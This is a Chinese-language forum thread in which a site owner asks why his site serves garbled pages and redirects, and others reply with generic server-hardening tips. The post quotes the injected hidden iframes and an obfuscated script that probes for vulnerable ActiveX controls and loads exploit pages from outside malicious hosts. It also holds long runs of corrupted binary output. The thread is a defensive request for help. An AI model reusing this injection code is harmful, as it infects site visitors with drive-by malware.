问题描述
大家好 不好意思我不小心把原来的那个问题给关掉了因为第一次使用javaeye的这个功能。。。我和几个朋友弄得一个网站, http://www.3qianke.cn 被人攻击了症状是我点击上面的链接时页面被跳转了显示出一堆乱码出来。网上搜索实在不知道是什么攻击以前没有遇到过这种情况。。。 请问是什么攻击我该如何防止。。。。谢谢 我们的服务器是自己的然后托管。。。。 机房目前是杭州最大的机房了,打了电话问过,机房说不是arp攻击也没有发现其它机器有什么异常让我们自己再找问题。 被攻击后显示的页面内容为 ?韂{SW?汿?t:=?腃 ツ薶 儽现誮]V奋軧???;沴? ~儘 ??瀣'?蕺L蜀詃'褙朐轌泛%Z#`?u?鳛s罟琰罟窂.Mv肤濋iZBN6w哰(陂v燊陡莪};}]?隻?厯TAd?蓊躲臬qMK顃:鞪{]?s黪篏1罩O潥オ+狤猷4a? QR6t貑?R?徥茲ψ淣縋T??旛餝湤 ?r魀1?T揻璓J嬎晈VN婟J€f?p?饳,E? S飀糔[MU潄嚦仝ZmVm*?I粯lf峖0,€4圧憣祮M乶删?牗坃嚑j矑沈D 懟洙0 @繸葨??'@以<語 $3紹,榫セ鏛o鳻G__M??>袴匘懧匲豻(?+N'?繣僘AVAu趱趵柌.a恘J崳愥9临?燵8>?菠)睭S<?*?垬?9k?M栛?f疦?6稂?%觥譼U Dni圧€燯-#5€FSM棃W *p??0犦じ;)'?Q嶦?*?Z$-晍T??斫袇?€擮趝v??揖#紭娐?"??[盻4c使Rl砀4園r?')?n隳S硑)蕍2?_鉙%@锷??U7宯秽躰埻?斷敗⒄鬦d苑 7?s?M?徳埊?(?0@M絇"??鍞Z2禈(G`W*?矺&狫B敢鑠冘菼M(経|)?/'?聯X?SED悋殮?K ??i??t ??.;?o&?6A諿璆蕹' ?`t偄MB辋キ鯆(苚rs?裙? 汄獾Q?8?饍琓p)厯礀l? ?A?KP? ?^譧2枙{vcb?鯐(l6V怷:橅?玥IE?Pu脗?J?蜷笈铴?>%漤獷9瑽弬A?N郔_氂Tu臨2潱=8+赙eQV?"?逡p秛N`k >oJ5貶>c?@]樢袙?燥,_爇狧镘旆a?掉$挤羽??憢0U桕5xIp1 峇N籨 醊 0腗??P@?.P?=温??"?z;j屏2&堥P崥??v];巛? h驱慉輆?'枾~[胤骪咋瞹?鏎?[?1oEd?Rb蓥?襮h誸pi薺G窒鯆妮 ?馵髥?ah鲇{?20!熁"x妩嵺???h?H?醯L阚`?嶉鸰g鹧HE犛?9%E枫?V秐?陆nu xo鍩v?尋富U?|湆%M矑纁 :ai}%I?S€帯)&?+?A 棻^M艶1駳N?蠾iLqHs(k捝?庴4B6:團?7yRài&t瘀熟鶱艴瀬}?Q$"9#蔬?byEcJ匹 %S筳?3?戳 MtF菒L笙/?'?n=囼C?衈M梢€抬 -.?RTV6?h9挏HEBVU坎v崀K?檿A峫"?陛em?柮g沰尺禝?醭Qz雵?v*嵙蘡止;?_窷R&痏(?胝Wζ?夡遇? S?縇5祤迦驢Tlp2^馾醰;$酕蹕o繨Z坖q-?iゑ俈#?鼠1萛2?y(?fzp54?Tn/W毜S谒U畡0?9` !區?cX╤QA拹鸭T€襞牯愕?焲?>( 蠬嬕PNH鍹n幵庿?rTp鋁鞅钶匣?舑勁?D烥6?埳n㏒悓:?瑍1鰀骙N劖:艚"咪錮?ヴ屙fh鶍z唻梫刈?hf?:芤3~叐c?o峠鷨?嚫_铜彬燚才v倡?犼襠)6(@..??非鉩k}顚猶Z頕抣滃┞啂嗶R饅g?撆罉,?萌艳ウ2P騋k鴶畯?鮝顕圅?8塟?z:Cg?邶笐:n黼餝,眉袶u础繎!?9Q圛~捴訕輷.苻阩3(>挹鰩焤矋T{赋譕qb2蜺Qr掋-`F???峦嵛pD愨@?Yz篛匊螺?)}筲F籊療#)晲?uN饄#?w1t蕻哩跋鵌b1匸犕憟4?T)?5洈擙j渻慓癪yC 吼?B$儶?曐E圥T宔┴?涢脳萵'嵡)8Jw?^€猂?鴒ST訄+?響 擿畳01!?邹}枷y"6$_WX??:xkt娉?FiDo跦鵻QV丄 秠Eq駩!}7M稗覾抣耚壙豃G%黦d侀€嚛G驗J[Mo'Kc拵??Zu椂?°X}招@耛荓M螵妭?"E[c烁?'?飞d_?釆??#瘞!??C?鬻v?l恢 ?ol銟k軉汀?Fi鐖?}H嵸;辛箶&7鎑蟂zn嘉并"诲3b6 薞猡程:d浒妉|泀?豴隱K7?抌I>?饛S?k 查看了页面源代码是 <iframe src=http://www.union501.cn/one/a20.htm width=0 height=0></iframe> ? 韂{SW?汿?t: =?腃 ツ薶 儽现誮]V奋軧???;沴? ~ 儘 ??瀣'?蕺L蜀詃'褙朐轌泛%Z#`?u?鳛s罟琰罟窂.Mv肤濋iZBN6w哰(陂v燊陡莪};}]?隻?厯TAd?蓊躲臬qMK顃:鞪{]?s黪篏1罩O潥オ+狤猷4a? QR6t貑?R?徥茲ψ淣縋T?? 旛餝湤 ?r魀1?T揻璓J嬎 晈VN婟J€f?p?饳,E? S飀糔[MU潄嚦仝ZmVm*?I粯lf峖0,€4圧憣祮M乶删?牗坃嚑j矑沈D 懟洙0 @繸葨??'@以<語 $3紹,榫セ鏛o鳻G__M??>袴匘懧匲豻(?+N'?繣僘AVAu趱趵柌.a恘J 崳愥9临?燵8>?菠)睭S<<?hIv"?趍璶√霥笹醔 .?徃鍜孽$h?zd也U-u7N芄丯骁?:?縫绌?X罡|u晗幍褘?kW?緷踭L}}s蝢玳碚?運??:隶7n?tL帣?q肱怙)(UB鍰! ;叟?袯鮱决f&脏 5讀糒}sKMss堮档讋?,Z堚0P剚宻豃-u鰐{蘏<脽噗躮]??圯拶引V碮郈)0媌W 弐W[_H閲:碢躐L-胷?? 詢胡細?{0實鯈 ?N8€麇?u贆睸W穽$X麔盦g庂憘蜰0)梓柂比悵觎j鱡捴?衍=)>?*?垬?9k?M栛?f疦?6稂?%觥譼U Dni圧€燯-#5€FSM棃W *p??0犦じ;)'?Q嶦?*?Z$-晍T??斫袇? €擮趝v??揖#紭娐?"??[盻4c使Rl砀4園r?')?n隳S 硑)蕍2?_鉙%@锷??U 7宯秽躰埻?斷敗⒄鬦d苑 7? s?M? 徳埊?(?0@M絇"??鍞Z2禈(G`W*?矺& 狫B敢鑠冘菼M(経|)?/'?聯<BY谜?肪[|厚谆 [涖咛黕B"6z'?訩?酿洸 餕7???災茾<?ebX鵉鰫摠缧怳謄?卡Oj? 胻?;?*≒)*@柳Itc癃?M?mS;"庶怾鮝N、@??濦Q,4歍???爇qH咰呍TD?0T韁V銽-,E罤鰼恙b ??S| ぉ碼W/ €猆U"驣?鹅V?瑉諈侸u^Q#壐鮏?燯:袧$Юkp?*?趗=翕?:稺梱eU鄅锣G挘摢jH?镍],?滺?tr縜LU飔鬡c艳?颶鳟uV??6;籹@割RL嬬[`6q蒊 ?磝x 楗娋?鵢wfo~H;h珕C裩徖k)`澦(@繒{?,o?{瞑?;;4%vn叅 E?暥?l滔黱齇诚W菌x期宧攼??5鯇肹虽I伨J5?p哼僕;?馮蕲O鈿"r4c€J刉J??椓??祟f}辔鍓k>X?SED悋殮?K ??i??t ? ?.;?o&?6A諿璆蕹' ?`t偄 MB辋キ鯆(苚rs?裙? 汄獾Q?8?饍琓p)厯礀l? ?A? KP? ?^譧2枙{vcb?鯐(l6V怷:橅? 玥IE?Pu脗?J?蜷笈铴?>%漤獷9瑽弬A?N郔_氂Tu臨2潱=8+赙eQV?"?逡p秛N`k >oJ5貶>c?@]樢袙?燥,_爇狧镘旆a?掉$挤羽??憢0U桕5xIp1 峇N籨 醊 0腗??P@?.P?=温??"?z;j屏2&堥P崥??v];巛? h驱慉輆?'枾~[胤骪咋瞹? 鏎?[?1oEd?Rb蓥?襮h誸pi薺G窒鯆妮 ?馵髥?ah鲇{?2 0!熁"x妩嵺???h?H?醯L阚`? 嶉鸰g鹧HE犛?9%E枫?V秐?陆nu xo鍩v?尋富U?|湆%M矑纁 :ai}%I?S€帯)&?+?A 棻^M艶1駳N?蠾iLqHs(k捝?庴4B6:團?7yRài&t瘀熟鶱艴瀬}? Q$"9#蔬 ?byEcJ匹 %S筳?3?戳 MtF菒L笙/?'?n=囼C? 衈M梢€抬 -.?RTV6?h9挏HEBVU坎v崀K?檿A峫"?陛em?柮g沰尺禝?醭Qz雵?v*嵙蘡止;?_窷R&痏(?胝Wζ?夡遇? S?縇5祤迦驢Tlp2^馾醰;$酕蹕o繨Z坖q-?iゑ俈#?鼠1萛2?y(?fzp54?Tn/W毜S谒U畡0?9` !區?cX╤QA拹鸭T€襞牯愕?焲?>( 蠬嬕PNH鍹n<qr座躀8'寞齚銄尰? 浃WC}]齐as+珼憥袯8乻?輏p?砉A筌B[F?腽?鬆???9戇? ?酱Q "k殰袐l邎勢?DN齣8饅桔囎l糀付铬?n?埴悯?^y罕秞嶂查nz 歰 G? C?7悧y礜枴?o>隔3挪~'懌y浹?乾5睽岑L迍橍9蒘l? ?N7s?怯 壑?璅o资逷i;3 慍``?pnq鬣怦宙qI鄥醢?懂仼?=WR2Qf聍俘G?A箩H"K]QdY????雳Da1庈zA盺??>幵庿?rTp鋁鞅钶匣?舑勁?D烥6<Eac}f韢碄3梀呲跬5椝鮫??~_c堢?腫茞!迳吾b嬊WZ諪cf涕?w菑鲗(uN帚粼aDY^犡z?[s貓怦?鍩P仮dv?lC?繢g?8B褡D?|躚_煒沑?"旈;琥风G{泽?焆櫆焁竟倍倒鬮鯊?蟔矍i彠鲳C桗肅0Ga为Q???饏柏x羣冭???燊?踣获p祧?/蚼蚠歔N輾_瀅?薷;5Y ④}Dy??6 ⒃?濞 J竨|fqn虢?[犄+&燒嚃,頎qv!齐? 1笞n輄?ha逡桔廤?煩呴y洑緐泓率月涑傧7?}9邾/L啔?婖鵮<?紉j孙~?ˇ<=:Px)竞舶0鱠jam魮g芋颩}]??k,燑漛X跨疬??祟Q$7?g朵e籠齜慙?繝?孇?? #荼绿}?.猧孚焙嫩+牂K飵J鸏椒/?厐?楽捾z 6券茊_?蝮兖? 縕~?券螁_?颢丰W€?l?仳3苒錼犸棸I?迻?gcy?髉ic}Y??i?廹7姧飍RM?箔婩^ ??爉?~"?J"G<泴盟泂_'悑坹y?藱豮P'捸g'坻9霁并屦+鯟2€?間4蕂撞(甪?勇i &+bQ紐G于丞h籏?罿?%/?/? ?村@塗|tp逖茓┰伊?澺,慗?[?慗=紂a韃塗栲仳gヽ:给頃?┌tpi黺㏕狚N茳肎%R伓霍恸w%R伓{}~鉵塗犿~<zm狣*衯??嚮K+毦僞寯F弲絬鬀彗?w懪W+铈醈`囹嗍I嚐黙v儹??M堔閣@?酼 ^疲冪惟 诓眒n戎縼&y劥?歾{靼n噍觽伔郕羘?J?輂(l攚/y?K9}唤=o愬湂矯?萇栺飂鰯揢,? n粬U6疾釙fxu鶋耬[+圳佖毲g?V6?蘉_鞭怔:倍]殤瀵海 岈~oiBe+,冝亐J;賫nI?薫?嗗仡柝W媸禫撇枙H世鰪 6O?魇鎄6?2G_酓/;急蓎錜 k gx唚0?藑5St缗菘氌*禔cTNK赐?w?肇?m?Y痍g町香瀤? 蛄暝?O痭?骴燠?T (僵l:闹{_碲?j匿>?埳n㏒悓:?瑍1鰀骙N劖:艚"咪錮?ヴ屙fh鶍z唻梫刈?hf?:芤3~叐c?o峠鷨?嚫_铜彬燚才v倡?犼襠)6(@..??非鉩k}顚猶Z頕抣滃┞啂嗶R饅g?撆罉,?萌艳ウ2P騋k鴶畯?鮝顕圅?8塟?z:Cg?邶笐:n黼餝,眉袶u础繎!?9Q圛~捴訕輷.苻阩3(>挹鰩焤矋T{赋譕qb2蜺Qr掋-`F???峦嵛pD愨@?Yz篛匊螺?)}筲F籊療#)晲?uN饄#?w1t蕻哩跋鵌b1匸犕憟4?T)?5洈擙j渻慓癪yC 吼?B$儶?曐E圥T宔┴?涢脳萵'嵡)8Jw?^€猂?鴒ST訄+?響 擿畳01 !?邹}枷y"6$_WX??:xkt娉?FiDo跦鵻QV丄 秠Eq駩!}7M稗覾抣耚壙豃G%黦d侀€嚛G驗J[Mo'K c拵??Zu椂?°X}招@耛荓M螵妭?"E [c烁?'?飞d_?釆??#瘞!??C?鬻v?l恢 ?ol銟k軉汀?Fi鐖?}H嵸;辛箶&7鎑蟂zn嘉并"诲3b6 薞猡程:d浒妉|泀?豴隱K7?抌I>?饛S?k 转向到的网址源代码是 <iframe src=http://wori360.tudou22.cn/14.htm width=100 height=0></iframe> <iframe src=http://wori360.tudou22.cn/fx.htm width=100 height=0></iframe> <script language=javascript src=http://wori360.tudou22.cn/real10.js></script> <script> var kaspersky="shabi" var L_czcY_1 = new window["Date"]() L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000) var Jy2$2 = new window["String"](window["document"]["cookie"]) var sX$bhbGk3 = "Cookie1=" var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3) if (zecKZZ4 == -1) { window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]() try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/newlz.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/real11.htm"></iframe>');}catch(e){} try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/lz.htm"></iframe>');}catch(e){} aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1; } </script> <script language="javascript" type="text/javascript" src="http://js.users.51.la/1611772.js"></script> --------------------------------------------------------------------------------问题补充这个不熟悉随便说说参考参考 一般要从软件和硬件两方面入手 首先当然也是最重要的是程序本身没有漏洞 过滤所有网站资源最好可以阻止别人扫描你的整个网站资源。 其次是硬件方面的 第二当然是硬件方面了如果可以最好不要开放服务器的远程连接功能或者只针对特定的机器开放。还可以购置硬件防火墙。温柔一刀 (初级程序员) 2008-06-12 采纳为答案如何阻止别人扫描我的整个站资源呢? 我总不能计算时间访问量吧 爬虫也要爬的哈...服务器端口没有多开奥..问题补充ftp被攻破了吧 先清下毒吧 顺便改改ftp的密码dong_ta (初级程序员) 2008-06-12 采纳为答案 顶楼上的!!!wzping (初级程序员) 2008-06-13 采纳为答案 我们压根就没开ftp端口。。。问题补充不是FTP的问题 。 1.首先确定 这个服武器的操作系统 是不是win 如果是win的话呢。建议安装一些杀毒软件。看看 如果不是win的话呢。请检查的用来上传到服务器上的机器上是否有病毒。 2.找个干净的电脑立刻备份服务器。下载下来。检查代码。清除跳转代码。 3.查看你的发布服务器 是否被修改。 最好直接备份 重装系统。然后整理代码 重新发布。 严格控制权限。markmx (初级程序员) 2008-06-14 采纳为答案我们的是centosweb服务器是apache+tomcat, 服务器上的代码和数据库拿下来后在本地测试机上是没有问题的。。。 检查代码,没有被改动过。。。我们的服务器不知道如何确定有没有被攻陷 没发现异常进程密码还是比较复杂的。。。 确定不了是怎么被攻击的唉。。问题补充今天攻击继续着。。我们做了4个方案今天攻击1930左右开始每次攻击时间没有前几天长了。 做了如下几个方案测试方案1apache 启动8280 端口 发现攻击的时候80网页是乱码82是好的。方案2停止apache单独使用tomcat 80端口发现攻击的时候是乱码。方案3停止将导向到静态页面发现这时候浏览器的状态栏里在不停地变但是跳转不到乱码页面。方案启动启动将首页面变成静态页面浏览器状态栏仍然在不停变。方案纯静态页面的源代码被插入了代码<iframe src=http://abc.17ok-1.cn/a1.htm?01 width=0 height=0></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>3qianke.cn</title><style type="text/css" media="screen">@import url("sys_halt/style/3qk_main.css");@import url("sys_halt/style/3qk_grzx.css");</style><link rel="Shortcut Icon" href="sys_halt/favicon.ico" /><link rel="Bookmark" href="sys_halt/favicon.ico" /></head><body></body></html> 就是说我们的网站之所以出问题是因为被插入了iframe。 还要继续查是如何得逞的。。iframe攻击还是xss。。大家给点意见奥。。。以前没碰到过。。不胜感谢问题补充继续补充 我们的源代码绝对是好的我怀疑响应内容被改发生在个地方一个就是服务器处理后被加上了另外一个就是局域网里间歇性地拦击添加了包并发送出去了。当出现问题时利用 得到的页面的内容是好的没有被加上而和浏览器里得到的全是被加了的乱码。tcpdump 和 iptraf 里面含有很多74,79的ip,当这些ip出现时很快机器被攻击页面返回乱码。 对wget原理不熟悉他拿到的代码是好的是不是说明问题出现在局域网里某台攻击机器串改了respone报文 请有经验的人帮忙。。。 是我们的服务器中招了是我们的web程序有漏洞什么漏洞
解决方案
看掉了,你是用的centos linux系统,一般来说做这种系统,照理来说就是比较安全的了,禁掉root用户ssh登陆,禁掉ftp匿名用户,用apache做服务的时候,最好是给apache分配一个专门的用户,而不是把它用root用户方式来启用的进程,用chown给apache用户分配指定的目录权限,还有给tomcat也用同样的方式,创建专门的用户来启动tomcat,这样来保证安全的最大化. 然后就是linux系统级的安全优化,检查系统用户列表,是否有可疑用户,是否有可疑进程,关闭掉所有不需要的端口,重点研究一下apache配置文件里的用户权限设置问题,该把目录设为更安全的,则设置好. 参见http://arqiang86.blog.163.com/blog/static/1092594200711821345830/这里,检查你的apache的安全配置是否做得最佳. 另外,把你的apache版本信息去掉,以免攻击者可以看到你的版本信息来找到具体的方法.去掉至少可以迷惑攻击者,一时不容易找到入口.最好把ssh这些端口改成另外的自己知道的端口,从最大程度上来保证服务器的安全.防火墙一定要配置好,另外就是对日志的监控要做好.
解决方案二
一般来说这个问题经常出现在windows服务器上,不一定是你程序上的问题,而是属于系统的安全问题,我们以前经常遇到这种问题,一般是把windows操作系统打上补丁把缓存清掉就可以了. 现在你也可以通过清掉你tomcat里的缓存来暂时解决,有时无论怎么清都会有这个问题.建议是不要用windows的服务器,我们现在都已经全部换成linux了.如果实在只能用windows服务器,就得经常给服务器打补丁,一般杀毒软件这些用处不大的. 还有重要的一条是要保证你们的开发机要安全,以免上线系统的时候把本机的病毒带到服务器机上. 最后,如果是windows服务器,强烈建议用linux,java应用在linux上效果更高一些.
解决方案三
不是FTP的问题 。1.首先确定 这个服武器的操作系统 是不是win 如果是win的话呢。建议安装一些杀毒软件。看看如果不是win的话呢。请检查的用来上传到服务器上的机器上是否有病毒。2.找个干净的电脑立刻备份服务器。下载下来。检查代码。清除跳转代码。3.查看你的发布服务器 是否被修改。最好直接备份 重装系统。然后整理代码 重新发布。 严格控制权限。
解决方案四
顶楼上的!!!
解决方案五
ftp被攻破了吧 先清下毒吧 顺便改改ftp的密码
解决方案六
这个不熟悉随便说说参考参考一般要从软件和硬件两方面入手首先当然也是最重要的是程序本身没有漏洞过滤所有网站资源最好可以阻止别人扫描你的整个网站资源。其次是硬件方面的第二当然是硬件方面了如果可以最好不要开放服务器的远程连接功能或者只针对特定的机器开放。还可以购置硬件防火墙。
解决方案七
被黑啦。。。。看来linux也不一定 安全阿